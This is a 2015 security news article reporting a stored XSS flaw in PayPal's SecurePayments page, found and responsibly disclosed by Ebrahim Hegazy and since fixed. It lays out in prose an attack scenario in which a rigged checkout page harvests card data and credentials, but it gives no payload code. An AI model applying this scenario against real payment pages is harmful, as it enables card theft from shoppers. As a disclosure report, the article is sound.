PayPal critical Flaw allows to steal all your funds

Pierluigi Paganini August 26, 2015

The expert Ebrahim Hegazy discovered a critical Stored XSS Vulnerability Paypal Critical Vulnerability to steal Users Credit Cards in ClearText format.

The popular security expert Ebrahim Hegazy (@Zigoo0) has discovered a critical Stored XSS Vulnerability in “” that could be exploited by attackers to steal Paypal users credit card and login credentials … and more!Paypal SecurePayments domain is used by the Paypal users to do secure payments when purchasing from any shopping site.This secure payments page require Paypal users to fill some forms that include their Credit Card number, CVV2, Expiry date and more, this information are necessary to finalize the payment and purchase the chosen products via their Paypal account.The submitted data is processed through encrypted channel (HTTPS) so attackers won’t be able to sniff/steal such data.

“I’ve found a Stored XSS vulnerability that affects the SecurePayment page directly which allowed me to alter the page HTML and rewrite the page content, An attacker can provide his own HTML forms to the user to fulfill and send the users data back to attacker’s server in clear text format, and then use this information to purchase anything in behave of users or even transfer the users fund to his own account!” wrote the expert in a blog post.

Hacking PayPal


Which are the attack scenarios?

Ebrahim explained that the worst attack scenario is:

  • Attacker setup shopping site or Hack into any shopping site, alter the “CheckOut” button with the Paypal Vulnerability,
  • Paypal user browse the malformed shopping site, choose some products, click on “CheckOut” button to Pay with his Paypal account,
  • User get’s redirected to to fill the required Credit Card information to complete the purchasing order, In the same page, the products price that will be paid is included inside the same page, and as we know the attacker now control this page!
  • Now when the Paypal user click on Submit Payment button, instead of paying let’s say “100$” YOU WILL PAY THE ATTACKER WHATEVER AMOUNT THE ATTACKER’S DECIDE!!

Below the video PoC published by the expert that shows how the attacker exploits the vulnerability to steal the user Credit Card and login Credentials information.

The expert ethically reported the flaw to Paypal that promptly fixed it, this is the Time Line of the bug:

  • Vulnerability Discovery: 19/Jun/15 2:27 AM
  • Vulnerability Reported: 19/Jun/15 7:10 AM
  • Remediation Notification: Aug 25, 2015 at 5:44 AM

Thanks Paypal Security team for the good coordination the fast responses for Emails.

Pierluigi Paganini

(Security Affairs – hacking, PayPal)

you might also like

leave a comment